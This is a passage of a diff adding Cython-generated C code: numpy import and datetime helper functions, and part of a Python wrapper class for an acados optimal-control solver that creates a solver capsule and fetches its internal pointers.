__pyx_tuple__10, NULL); if (unlikely(!__pyx_t_8)) __PYX_ERR(2, 992, __pyx_L5_except_error) + __Pyx_GOTREF(__pyx_t_8); + __Pyx_Raise(__pyx_t_8, 0, 0, 0); + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __PYX_ERR(2, 992, __pyx_L5_except_error) + } + goto __pyx_L5_except_error; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":989 + * + * cdef inline int import_umath() except -1: + * try: # <<<<<<<<<<<<<< + * _import_umath() + * except Exception: + */ + __pyx_L5_except_error:; + __Pyx_XGIVEREF(__pyx_t_1); + __Pyx_XGIVEREF(__pyx_t_2); + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_ExceptionReset(__pyx_t_1, __pyx_t_2, __pyx_t_3); + goto __pyx_L1_error; + __pyx_L8_try_end:; + } + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":988 + * raise ImportError("numpy.core.multiarray failed to import") + * + * cdef inline int import_umath() except -1: # <<<<<<<<<<<<<< + * try: + * _import_umath() + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_XDECREF(__pyx_t_8); + __Pyx_AddTraceback("numpy.import_umath", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":994 + * raise ImportError("numpy.core.umath failed to import") + * + * cdef inline int import_ufunc() except -1: # <<<<<<<<<<<<<< + * try: + * _import_umath() + */ + +static CYTHON_INLINE int __pyx_f_5numpy_import_ufunc(void) { + int __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + PyObject *__pyx_t_8 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("import_ufunc", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":995 + * + * cdef inline int import_ufunc() except -1: + * try: # <<<<<<<<<<<<<< + * _import_umath() + * except Exception: + */ + { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ExceptionSave(&__pyx_t_1, &__pyx_t_2, &__pyx_t_3); + __Pyx_XGOTREF(__pyx_t_1); + __Pyx_XGOTREF(__pyx_t_2); + __Pyx_XGOTREF(__pyx_t_3); + /*try:*/ { + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":996 + * cdef inline int import_ufunc() except -1: + * try: + * _import_umath() # <<<<<<<<<<<<<< + * except Exception: + * raise ImportError("numpy.core.umath failed to import") + */ + __pyx_t_4 = _import_umath(); if (unlikely(__pyx_t_4 == ((int)-1))) __PYX_ERR(2, 996, __pyx_L3_error) + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":995 + * + * cdef inline int import_ufunc() except -1: + * try: # <<<<<<<<<<<<<< + * _import_umath() + * except Exception: + */ + } + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + goto __pyx_L8_try_end; + __pyx_L3_error:; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":997 + * try: + * _import_umath() + * except Exception: # <<<<<<<<<<<<<< + * raise ImportError("numpy.core.umath failed to import") + * + */ + __pyx_t_4 = __Pyx_PyErr_ExceptionMatches(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0]))); + if (__pyx_t_4) { + __Pyx_AddTraceback("numpy.import_ufunc", __pyx_clineno, __pyx_lineno, __pyx_filename); + if (__Pyx_GetException(&__pyx_t_5, &__pyx_t_6, &__pyx_t_7) < 0) __PYX_ERR(2, 997, __pyx_L5_except_error) + __Pyx_XGOTREF(__pyx_t_5); + __Pyx_XGOTREF(__pyx_t_6); + __Pyx_XGOTREF(__pyx_t_7); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":998 + * _import_umath() + * except Exception: + * raise ImportError("numpy.core.umath failed to import") # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_8 = __Pyx_PyObject_Call(__pyx_builtin_ImportError, __pyx_tuple__10, NULL); if (unlikely(!__pyx_t_8)) __PYX_ERR(2, 998, __pyx_L5_except_error) + __Pyx_GOTREF(__pyx_t_8); + __Pyx_Raise(__pyx_t_8, 0, 0, 0); + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __PYX_ERR(2, 998, __pyx_L5_except_error) + } + goto __pyx_L5_except_error; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":995 + * + * cdef inline int import_ufunc() except -1: + * try: # <<<<<<<<<<<<<< + * _import_umath() + * except Exception: + */ + __pyx_L5_except_error:; + __Pyx_XGIVEREF(__pyx_t_1); + __Pyx_XGIVEREF(__pyx_t_2); + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_ExceptionReset(__pyx_t_1, __pyx_t_2, __pyx_t_3); + goto __pyx_L1_error; + __pyx_L8_try_end:; + } + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":994 + * raise ImportError("numpy.core.umath failed to import") + * + * cdef inline int import_ufunc() except -1: # <<<<<<<<<<<<<< + * try: + * _import_umath() + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_XDECREF(__pyx_t_8); + __Pyx_AddTraceback("numpy.import_ufunc", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1001 + * + * + * cdef inline bint is_timedelta64_object(object obj): # <<<<<<<<<<<<<< + * """ + * Cython equivalent of `isinstance(obj, np.timedelta64)` + */ + +static CYTHON_INLINE int __pyx_f_5numpy_is_timedelta64_object(PyObject *__pyx_v_obj) { + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("is_timedelta64_object", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1013 + * bool + * """ + * return PyObject_TypeCheck(obj, &PyTimedeltaArrType_Type) # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = PyObject_TypeCheck(__pyx_v_obj, (&PyTimedeltaArrType_Type)); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1001 + * + * + * cdef inline bint is_timedelta64_object(object obj): # <<<<<<<<<<<<<< + * """ + * Cython equivalent of `isinstance(obj, np.timedelta64)` + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1016 + * + * + * cdef inline bint is_datetime64_object(object obj): # <<<<<<<<<<<<<< + * """ + * Cython equivalent of `isinstance(obj, np.datetime64)` + */ + +static CYTHON_INLINE int __pyx_f_5numpy_is_datetime64_object(PyObject *__pyx_v_obj) { + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("is_datetime64_object", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1028 + * bool + * """ + * return PyObject_TypeCheck(obj, &PyDatetimeArrType_Type) # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = PyObject_TypeCheck(__pyx_v_obj, (&PyDatetimeArrType_Type)); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1016 + * + * + * cdef inline bint is_datetime64_object(object obj): # <<<<<<<<<<<<<< + * """ + * Cython equivalent of `isinstance(obj, np.datetime64)` + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1031 + * + * + * cdef inline npy_datetime get_datetime64_value(object obj) nogil: # <<<<<<<<<<<<<< + * """ + * returns the int64 value underlying scalar numpy datetime64 object + */ + +static CYTHON_INLINE npy_datetime __pyx_f_5numpy_get_datetime64_value(PyObject *__pyx_v_obj) { + npy_datetime __pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1038 + * also needed. That can be found using `get_datetime64_unit`. + * """ + * return (obj).obval # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = ((PyDatetimeScalarObject *)__pyx_v_obj)->obval; + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1031 + * + * + * cdef inline npy_datetime get_datetime64_value(object obj) nogil: # <<<<<<<<<<<<<< + * """ + * returns the int64 value underlying scalar numpy datetime64 object + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1041 + * + * + * cdef inline npy_timedelta get_timedelta64_value(object obj) nogil: # <<<<<<<<<<<<<< + * """ + * returns the int64 value underlying scalar numpy timedelta64 object + */ + +static CYTHON_INLINE npy_timedelta __pyx_f_5numpy_get_timedelta64_value(PyObject *__pyx_v_obj) { + npy_timedelta __pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1045 + * returns the int64 value underlying scalar numpy timedelta64 object + * """ + * return (obj).obval # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = ((PyTimedeltaScalarObject *)__pyx_v_obj)->obval; + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1041 + * + * + * cdef inline npy_timedelta get_timedelta64_value(object obj) nogil: # <<<<<<<<<<<<<< + * """ + * returns the int64 value underlying scalar numpy timedelta64 object + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1048 + * + * + * cdef inline NPY_DATETIMEUNIT get_datetime64_unit(object obj) nogil: # <<<<<<<<<<<<<< + * """ + * returns the unit part of the dtype for a numpy datetime64 object. + */ + +static CYTHON_INLINE NPY_DATETIMEUNIT __pyx_f_5numpy_get_datetime64_unit(PyObject *__pyx_v_obj) { + NPY_DATETIMEUNIT __pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1052 + * returns the unit part of the dtype for a numpy datetime64 object. + * """ + * return (obj).obmeta.base # <<<<<<<<<<<<<< + */ + __pyx_r = ((NPY_DATETIMEUNIT)((PyDatetimeScalarObject *)__pyx_v_obj)->obmeta.base); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1048 + * + * + * cdef inline NPY_DATETIMEUNIT get_datetime64_unit(object obj) nogil: # <<<<<<<<<<<<<< + * """ + * returns the unit part of the dtype for a numpy datetime64 object. + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":74 + * cdef str nlp_solver_type + * + * def __cinit__(self, model_name, nlp_solver_type, N): # <<<<<<<<<<<<<< + * + * self.solver_created = False + */ + +/* Python wrapper */ +static int __pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_1__cinit__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds); /*proto*/ +static int __pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_1__cinit__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds) { + PyObject *__pyx_v_model_name = 0; + PyObject *__pyx_v_nlp_solver_type = 0; + PyObject *__pyx_v_N = 0; + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__cinit__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_model_name,&__pyx_n_s_nlp_solver_type,&__pyx_n_s_N,0}; + PyObject* values[3] = {0,0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_VARARGS(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_VARARGS(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_VARARGS(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_model_name)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 74, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_nlp_solver_type)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 74, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__cinit__", 1, 3, 3, 1); __PYX_ERR(0, 74, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (likely((values[2] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_N)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 74, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__cinit__", 1, 3, 3, 2); __PYX_ERR(0, 74, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__cinit__") < 0)) __PYX_ERR(0, 74, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 3)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + values[1] = __Pyx_Arg_VARARGS(__pyx_args, 1); + values[2] = __Pyx_Arg_VARARGS(__pyx_args, 2); + } + __pyx_v_model_name = values[0]; + __pyx_v_nlp_solver_type = values[1]; + __pyx_v_N = values[2]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__cinit__", 1, 3, 3, __pyx_nargs); __PYX_ERR(0, 74, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.__cinit__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return -1; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython___cinit__(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self), __pyx_v_model_name, __pyx_v_nlp_solver_type, __pyx_v_N); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython___cinit__(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, PyObject *__pyx_v_model_name, PyObject *__pyx_v_nlp_solver_type, PyObject *__pyx_v_N) { + int __pyx_r; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + int __pyx_t_3; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__cinit__", 0); + + /* "acados_template/acados_ocp_solver_pyx.pyx":76 + * def __cinit__(self, model_name, nlp_solver_type, N): + * + * self.solver_created = False # <<<<<<<<<<<<<< + * + * self.N = N + */ + __pyx_v_self->solver_created = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":78 + * self.solver_created = False + * + * self.N = N # <<<<<<<<<<<<<< + * self.model_name = model_name + * self.nlp_solver_type = nlp_solver_type + */ + __pyx_t_1 = __Pyx_PyInt_As_int(__pyx_v_N); if (unlikely((__pyx_t_1 == (int)-1) && PyErr_Occurred())) __PYX_ERR(0, 78, __pyx_L1_error) + __pyx_v_self->N = __pyx_t_1; + + /* "acados_template/acados_ocp_solver_pyx.pyx":79 + * + * self.N = N + * self.model_name = model_name # <<<<<<<<<<<<<< + * self.nlp_solver_type = nlp_solver_type + * + */ + if (!(likely(PyUnicode_CheckExact(__pyx_v_model_name))||((__pyx_v_model_name) == Py_None) || __Pyx_RaiseUnexpectedTypeError("unicode", __pyx_v_model_name))) __PYX_ERR(0, 79, __pyx_L1_error) + __pyx_t_2 = __pyx_v_model_name; + __Pyx_INCREF(__pyx_t_2); + __Pyx_GIVEREF(__pyx_t_2); + __Pyx_GOTREF(__pyx_v_self->model_name); + __Pyx_DECREF(__pyx_v_self->model_name); + __pyx_v_self->model_name = ((PyObject*)__pyx_t_2); + __pyx_t_2 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":80 + * self.N = N + * self.model_name = model_name + * self.nlp_solver_type = nlp_solver_type # <<<<<<<<<<<<<< + * + * # create capsule + */ + if (!(likely(PyUnicode_CheckExact(__pyx_v_nlp_solver_type))||((__pyx_v_nlp_solver_type) == Py_None) || __Pyx_RaiseUnexpectedTypeError("unicode", __pyx_v_nlp_solver_type))) __PYX_ERR(0, 80, __pyx_L1_error) + __pyx_t_2 = __pyx_v_nlp_solver_type; + __Pyx_INCREF(__pyx_t_2); + __Pyx_GIVEREF(__pyx_t_2); + __Pyx_GOTREF(__pyx_v_self->nlp_solver_type); + __Pyx_DECREF(__pyx_v_self->nlp_solver_type); + __pyx_v_self->nlp_solver_type = ((PyObject*)__pyx_t_2); + __pyx_t_2 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":83 + * + * # create capsule + * self.capsule = acados_solver.acados_create_capsule() # <<<<<<<<<<<<<< + * + * # create solver + */ + __pyx_v_self->capsule = lat_acados_create_capsule(); + + /* "acados_template/acados_ocp_solver_pyx.pyx":86 + * + * # create solver + * assert acados_solver.acados_create(self.capsule) == 0 # <<<<<<<<<<<<<< + * self.solver_created = True + * + */ + #ifndef CYTHON_WITHOUT_ASSERTIONS + if (unlikely(__pyx_assertions_enabled())) { + __pyx_t_3 = (lat_acados_create(__pyx_v_self->capsule) == 0); + if (unlikely(!__pyx_t_3)) { + __Pyx_Raise(__pyx_builtin_AssertionError, 0, 0, 0); + __PYX_ERR(0, 86, __pyx_L1_error) + } + } + #else + if ((1)); else __PYX_ERR(0, 86, __pyx_L1_error) + #endif + + /* "acados_template/acados_ocp_solver_pyx.pyx":87 + * # create solver + * assert acados_solver.acados_create(self.capsule) == 0 + * self.solver_created = True # <<<<<<<<<<<<<< + * + * # get pointers solver + */ + __pyx_v_self->solver_created = 1; + + /* "acados_template/acados_ocp_solver_pyx.pyx":90 + * + * # get pointers solver + * self.__get_pointers_solver() # <<<<<<<<<<<<<< + * self.status = 0 + * + */ + __pyx_t_4 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_AcadosOcpSolverCython__get_poin); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 90, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = NULL; + __pyx_t_1 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_4))) { + __pyx_t_5 = PyMethod_GET_SELF(__pyx_t_4); + if (likely(__pyx_t_5)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_4); + __Pyx_INCREF(__pyx_t_5); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_4, function); + __pyx_t_1 = 1; + } + } + { + PyObject *__pyx_callargs[1] = {__pyx_t_5, }; + __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_4, __pyx_callargs+1-__pyx_t_1, 0+__pyx_t_1); + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 90, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + } + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":91 + * # get pointers solver + * self.__get_pointers_solver() + * self.status = 0 # <<<<<<<<<<<<<< + * + * + */ + __pyx_v_self->status = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":74 + * cdef str nlp_solver_type + * + * def __cinit__(self, model_name, nlp_solver_type, N): # <<<<<<<<<<<<<< + * + * self.solver_created = False + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.__cinit__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":94 + * + * + * def __get_pointers_solver(self): # <<<<<<<<<<<<<< + * """ + * Private function to get the pointers for solver + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_3_AcadosOcpSolverCython__get_pointers_solver(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +PyDoc_STRVAR(__pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_2__get_pointers_solver, "\n Private function to get the pointers for solver\n "); +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_3_AcadosOcpSolverCython__get_pointers_solver = {"_AcadosOcpSolverCython__get_pointers_solver", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_3_AcadosOcpSolverCython__get_pointers_solver, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_2__get_pointers_solver}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_3_AcadosOcpSolverCython__get_pointers_solver(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("_AcadosOcpSolverCython__get_pointers_solver (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("_AcadosOcpSolverCython__get_pointers_solver", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "_AcadosOcpSolverCython__get_pointers_solver", 0))) return NULL; + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_2__get_pointers_solver(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_2__get_pointers_solver(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("_AcadosOcpSolverCython__get_pointers_solver", 0); + + /* "acados_template/acados_ocp_solver_pyx.pyx":99 + * """ + * # get pointers solver + * self.nlp_opts = acados_solver.acados_get_nlp_opts(self.capsule) # <<<<<<<<<<<<<< + * self.nlp_dims = acados_solver.acados_get_nlp_dims(self.capsule) + * self.nlp_config = acados_solver.acados_get_nlp_config(self.capsule) + */ + __pyx_v_self->nlp_opts = lat_acados_get_nlp_opts(__pyx_v_self->capsule); + + /* "acados_template/acados_ocp_solver_pyx.pyx":100 + * # get pointers solver + * self.nlp_opts = acados_solver.acados_get_nlp_opts(self.capsule) + * self.nlp_dims = acados_solver.acados_get_nlp_dims(self.capsule) # <<<<<<<<<<<<<< + * self.nlp_config = acados_solver.acados_get_nlp_config(self.capsule) + * self.nlp_out = acados_solver.acados_get_nlp_out(self.capsule) + */ + __pyx_v_self->nlp_dims = lat_acados_get_nlp_dims(__pyx_v_self->capsule); + + /* "acados_template/acados_ocp_solver_pyx.pyx":101 + * self.nlp_opts = acados_solver.acados_get_nlp_opts(self.capsule) + * self.nlp_dims = acados_solver.acados_get_nlp_dims(self.capsule) + * self.nlp_config = acados_solver.acados_get_nlp_config(self.capsule) # <<<<<<<<<<<<<< + * self.nlp_out = acados_solver.acados_get_nlp_out(self.capsule) + * self.sens_out = acados_solver.acados_get_sens_out(self.capsule) + */ + __pyx_v_self->nlp_config = lat_acados_get_nlp_config(__pyx_v_self->capsule); + + /* "acados_template/acados_ocp_solver_pyx.pyx":102 + * self.nlp_dims = acados_solver.acados_get_nlp_dims(self.capsule) + * self.nlp_config = acados_solver.acados_get_nlp_config(self.capsule) + * self.nlp_out = acados_solver.acados_get_nlp_out(self.capsule) # <<<<<<<<<<<<<< + * self.sens_out = acados_solver.acados_get_sens_out(self.capsule) + * self.nlp_in = acados_solver.acados_get_nlp_in(self.capsule) + */ + __pyx_v_self->nlp_out = lat_acados_get_nlp_out(__pyx_v_self->capsule); + + /* "acados_template/acados_ocp_solver_pyx.pyx":103 + * self.nlp_config = acados_solver.acados_get_nlp_config(self.capsule) + * self.nlp_out = acados_solver.acados_get_nlp_out(self.capsule) + * self.sens_out = acados_solver.acados_get_sens_out(self.capsule) # <<<<<<<<<<<<<< + * self.nlp_in = acados_solver.acados_get_nlp_in(self.capsule) + * self.nlp_solver = acados_solver.acados_get_nlp_solver(self.capsule) + */ + __pyx_v_self->sens_out = lat_acados_get_sens_out(__pyx_v_self->capsule); + + /* "acados_template/acados_ocp_solver_pyx.pyx":104 + * self.nlp_out = acados_solver.acados_get_nlp_out(self.capsule) + * self.sens_out = acados_solver.acados_get_sens_out(self.capsule) + * self.nlp_in = acados_solver.acados_get_nlp_in(self.capsule) # <<<<<<<<<<<<<< + * self.nlp_solver = acados_solver.acados_get_nlp_solver(self.capsule) + * + */ + __pyx_v_self->nlp_in = lat_acados_get_nlp_in(__pyx_v_self->capsule); + + /* "acados_template/acados_ocp_solver_pyx.pyx":105 + * self.sens_out = acados_solver.acados_get_sens_out(self.capsule) + * self.nlp_in = acados_solver.acados_get_nlp_in(self.capsule) + * self.nlp_solver = acados_solver.acados_get_nlp_solver(self.capsule) # <<<<<<<<<<<<<< + * + * + */ + __pyx_v_self->nlp_solver = lat_acados_get_nlp_solver(__pyx_v_self->capsule); + + /* "acados_template/acados_ocp_solver_pyx.pyx":94 + * + * + * def 